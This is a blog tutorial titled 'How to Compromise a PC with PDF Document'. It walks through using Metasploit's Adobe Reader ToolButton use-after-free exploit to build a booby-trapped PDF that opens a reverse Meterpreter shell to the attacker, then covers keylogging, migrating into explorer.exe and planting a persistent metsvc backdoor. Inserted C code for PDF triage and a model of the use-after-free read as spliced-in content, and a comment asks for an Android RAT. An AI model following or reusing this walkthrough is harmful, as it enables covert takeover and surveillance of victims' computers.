
How to Compromise a PC with PDF Document

In one of my previous articles, I analysed how hackers can leverage embedded JavaScript to exploit a system (in an .svg image). PDF documents can be used in the same way as .svg images, but sometimes there are better options, which is the topic of this article.

Every year, security researchers find several vulnerabilities of this type, and PDF reader vendors patch them as soon as they find out. Once a vulnerability is public, there is a brief period (about 1 week) in which this attack vector is effective, because some people haven't updated their software yet.

In this article, I'll demonstrate how hackers can exploit the fact that many people don't patch their programs on time, resulting in remote code execution.

When a victim opens the malicious document there are 2 possible scenarios:

  1. The victim hasn’t patched their PDF reader and the exploit works – the attacker can run arbitrary code on the victim’s machine. Of course, if the attacker has found an unknown vulnerability (0-day), he can compromise the victim’s PC even if the PDF reader software is up to date.
  2. The victim has patched their PDF reader and the exploit doesn’t work.
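Both scenarios assume the document reaches the reader at all. A defender's first check, added here as an example that is not part of the original article and not Metasploit or Adobe code, is to triage incoming PDFs for the features this kind of document needs (JavaScript, actions that fire on open, launch actions, embedded files) before any reader parses them. The C program below decodes the #xx hex escapes PDF allows in names, so an obfuscated /J#61vaScript is still recognised as /JavaScript, and counts the risky names. The embedded sample PDF is constructed for the demo, and the name list and the function names are the example's own choices, not a standard.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* PDF name objects worth a second look before a file reaches a reader
 * (the example's own list, not a standard). */
static const char *const RISKY[] = {
    "/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile", "/RichMedia"
};
#define NRISKY (sizeof RISKY / sizeof RISKY[0])

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode the #xx escapes PDF allows inside names, so /J#61vaScript becomes
 * /JavaScript. NUL bytes are replaced by '.' so strstr() can run over the
 * result. out must hold at least len + 1 bytes; returns the output length. */
size_t pdf_unescape_names(const unsigned char *in, size_t len, char *out) {
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = in[i];
        if (c == '#' && i + 2 < len) {
            int h = hexval(in[i + 1]), l = hexval(in[i + 2]);
            if (h >= 0 && l >= 0) { c = (unsigned char)(h * 16 + l); i += 2; }
        }
        out[o++] = c ? (char)c : '.';
    }
    out[o] = '\0';
    return o;
}

/* A name ends at whitespace or a PDF delimiter; this keeps /JS from
 * matching the start of some longer, unrelated name. */
static int is_regular_char(int c) {
    return c != '\0' && !isspace(c) && strchr("()<>[]{}/%", c) == NULL;
}

static int count_name(const char *hay, const char *name) {
    int n = 0;
    size_t nl = strlen(name);
    for (const char *p = hay; (p = strstr(p, name)) != NULL; p += nl)
        if (!is_regular_char((unsigned char)p[nl])) n++;
    return n;
}

/* Fill counts[] per risky name; return how many distinct risky names occur
 * (-1 on allocation failure). Looks at raw bytes only: objects hidden in
 * compressed object streams are not inflated here. */
int pdf_triage(const unsigned char *pdf, size_t len, int counts[NRISKY]) {
    char *norm = malloc(len + 1);
    if (!norm) return -1;
    pdf_unescape_names(pdf, len, norm);
    int distinct = 0;
    for (size_t k = 0; k < NRISKY; k++) {
        counts[k] = count_name(norm, RISKY[k]);
        if (counts[k] > 0) distinct++;
    }
    free(norm);
    return distinct;
}

/* Constructed sample: a minimal PDF skeleton whose catalog fires JavaScript
 * on open, with one name hex-escaped the way evasive samples do. */
static const char SAMPLE_PDF[] =
    "%PDF-1.4\n"
    "1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    "2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    "3 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample')) >> endobj\n"
    "trailer << /Root 1 0 R >>\n"
    "%%EOF\n";

/* Run the triage over the sample and print the hits; returns the distinct count (3). */
int triage_sample(void) {
    int counts[NRISKY];
    int distinct = pdf_triage((const unsigned char *)SAMPLE_PDF, sizeof SAMPLE_PDF - 1, counts);
    for (size_t k = 0; k < NRISKY; k++)
        if (counts[k] > 0) printf("%-14s x%d\n", RISKY[k], counts[k]);
    printf("%d risky name(s) found\n", distinct);
    return distinct;
}

int main(void) {
    triage_sample();
    return 0;
}
```

Treat a hit as a reason to detonate the file in a sandbox or hold it at the mail gateway, not as proof of an exploit: legitimate forms use /JavaScript and /AA too. The reverse also holds; the scanner reads raw bytes and does not inflate compressed object streams, so a clean result is not proof of safety.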

Let's create a PDF document that will create a backdoor once it is opened with an old, vulnerable version of Adobe Reader.

I'll use Metasploit on Kali Linux to do the heavy lifting. The goal is to get a terminal on the victim's computer and own the device.

Exploit Information

First, start msfconsole and choose an exploit. This self-explanatory search shows how to find the best exploit for your case:

search type:exploit platform:windows adobe pdf

I chose the Adobe Reader 'adobe_toolbutton' Use-After-Free vulnerability. It allows attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required: the target must visit a malicious page or open a malicious file.

Use-After-Free refers to accessing memory after it has been freed. At best this crashes the program; at worst it lets an attacker execute arbitrary code, up to full remote code execution.

The specific flaw exists within the handling of the callbacks associated with ToolButton objects. A reference to the ToolButton object is kept while a callback executes, which leads to a use-after-free if the callback removes the ToolButton object. An attacker can leverage this situation to execute code in the context of the current user.
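To make the lifetime bug concrete, here is an added C model of the pattern just described; it is not Adobe's code and not from the Metasploit module, and ToolButton, the callback and the retain/release helpers are the example's own names. A dispatcher keeps a raw pointer to the object while running its callback, and the callback removes the object. Instead of calling free() at release time, the model marks released objects dead so the dangling access is detected deterministically rather than being undefined behaviour. dispatch_safe shows the standard fix: take a strong reference for as long as the callback runs.

```c
#include <stdio.h>
#include <stdlib.h>

typedef struct ToolButton ToolButton;
typedef void (*ClickCallback)(ToolButton *);

/* Hypothetical model of a UI object that owns a callback. */
struct ToolButton {
    int refcount;          /* strong references held by the document/dispatcher */
    int alive;             /* cleared when the last reference is dropped */
    int clicks;
    ClickCallback on_click;
};

static int uaf_detected;   /* how many times a released button was touched */

static ToolButton *button_new(ClickCallback cb) {
    ToolButton *b = calloc(1, sizeof *b);
    if (!b) { perror("calloc"); exit(EXIT_FAILURE); }
    b->refcount = 1;
    b->alive = 1;
    b->on_click = cb;
    return b;
}

static void button_retain(ToolButton *b) { b->refcount++; }

/* Drop a reference. The model marks the object dead instead of calling
 * free(); in real code AddressSanitizer or a quarantining allocator would
 * flag the later access instead of this alive flag. */
static void button_release(ToolButton *b) {
    if (--b->refcount == 0) b->alive = 0;
}

/* Any field access after the object is gone counts as a use-after-free. */
static void button_touch(ToolButton *b) {
    if (!b->alive) { uaf_detected++; return; }
    b->clicks++;
}

/* The document holds the only reference; the callback removes the button. */
static ToolButton *doc_button;

static void cb_remove_self(ToolButton *b) {
    if (doc_button == b) {
        doc_button = NULL;
        button_release(b);       /* last reference dropped inside the callback */
    }
}

/* Vulnerable dispatcher: keeps only a raw pointer across the callback.
 * Returns the number of dangling accesses (1). */
int dispatch_unsafe(void) {
    uaf_detected = 0;
    doc_button = button_new(cb_remove_self);
    ToolButton *b = doc_button;
    b->on_click(b);
    button_touch(b);             /* object already released: dangling use */
    free(b);                     /* model memory is still valid, reclaim it */
    return uaf_detected;
}

/* Fixed dispatcher: takes a strong reference for the callback's lifetime.
 * Returns the number of dangling accesses (0). */
int dispatch_safe(void) {
    uaf_detected = 0;
    doc_button = button_new(cb_remove_self);
    ToolButton *b = doc_button;
    button_retain(b);
    b->on_click(b);              /* callback drops the document's reference */
    button_touch(b);             /* still alive: dispatcher owns one reference */
    button_release(b);           /* refcount reaches 0 here, not inside the callback */
    free(b);
    return uaf_detected;
}

int main(void) {
    printf("unsafe dispatch: %d dangling access(es)\n", dispatch_unsafe());
    printf("safe dispatch:   %d dangling access(es)\n", dispatch_safe());
    return 0;
}
```

The discipline the fix encodes is general: any call that can re-enter object destruction (a script callback, an event handler, a destructor hook) must be bracketed by a reference the caller owns, so the object cannot disappear underneath the code that invoked it.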

Creating Payload

  1. Choose the exploit. Once it is selected, the show options command should list the possible targets for this exploit:

  2. Set the file name (optional):

This can be done later, when you change the document to look legitimate. If you already have a prepared PDF document, you can use set infilename <path-to-file> to embed the payload in it.

  3. Choose the payload: a reverse TCP shell for Windows in our case, but of course this can be a custom one or any other Metasploit payload. With a reverse shell we can load other payloads whenever we want, so that's our choice.

  4. Set the IP address and port (any unused port is fine) to connect back to:

  5. Create the PDF document with the payload: exploit

Use the show options command for troubleshooting; this is what it should look like:

Wait for the victim to connect back to you

As you can see, the PDF document is created. Before we send it, we need to start a listener on that port:

[*] Started reverse handler on 10.0.2.15:10000

[*] Starting the payload handler…

Just make sure to use the same IP and port you used when you created the PDF, and this will start a listener. Once a victim opens the document in a vulnerable version of Adobe Reader, this will happen on the attacker's machine:

[*] Sending stage (770048 bytes) to <Target IP>

[*] Meterpreter session 1 opened (10.0.10.15:10000 -> <Target IP>:1138) at 2016-12-19 19:03:43 -0500

meterpreter >

Migrate Meterpreter to another process

Once the "meterpreter >" prompt shows, we own the victim's machine. Now we can start a keylogger, browse the disk, etc. It is also useful to migrate into the explorer.exe process in case our process gets closed:

Making the backdoor persistent

After going through all the hard work of exploiting a system, it's often a good idea to leave yourself an easier way back into the system later. That way, if the service you exploited is down or patched, you can still gain access to the system.

Using the metsvc backdoor, you can gain a Meterpreter shell at any point.

This is how you activate the metsvc to get a Meterpreter session (shell):

Immediately after entering exploit, we get a Meterpreter session just like before.

3 comments

  1. Always update ALL the software on your computers! Keep your installed applications/software "lean"; flush unused stuff.

    Don't install software you find on the internet; always use software from valid sources and check the MD5 hash if possible.

    And preferably, use open source software. Avoid any Microsoft Windows versions at all cost.

  2. plz tell about how to bind android rat to image and make persistence?????????????
